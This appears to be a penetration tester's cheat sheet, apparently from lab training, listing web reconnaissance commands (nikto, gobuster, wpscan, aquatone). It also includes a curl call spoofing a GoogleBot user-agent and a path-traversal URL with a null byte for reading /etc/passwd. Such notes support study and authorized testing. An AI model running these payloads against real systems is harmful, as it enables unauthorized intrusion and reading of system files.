nikto -host thedomain.com
dirb http://10.11.1.140
gobuster dir -u http://192.168.124.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
If it won't let your read robots.txt because you're not a search engine, use curl and googlebot Agent string
curl -A 'GoogleBot' http://$ip/robots.txt
Add the following to the hosts file 10.11.1.140 domainname.com
Linux is /etc/hosts
Windows is C:\windows\system32\drivers\etc\hosts
# To attempt to view the /etc/passwd file
http://host/index.php?page=./../../../../../etc/passwd%00
# Enumerate users on wordpress site
wpscan targetsite.com --enumerate u
wafw00f ip
apt install chromium
wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
unzip aquatone_linux_amd64_1.7.0.zip
mv aquatone /usr/local/bin/
# Place all of your domains in a file called host
# aquatone will check if exists, and take screenshot
cat host | aquatone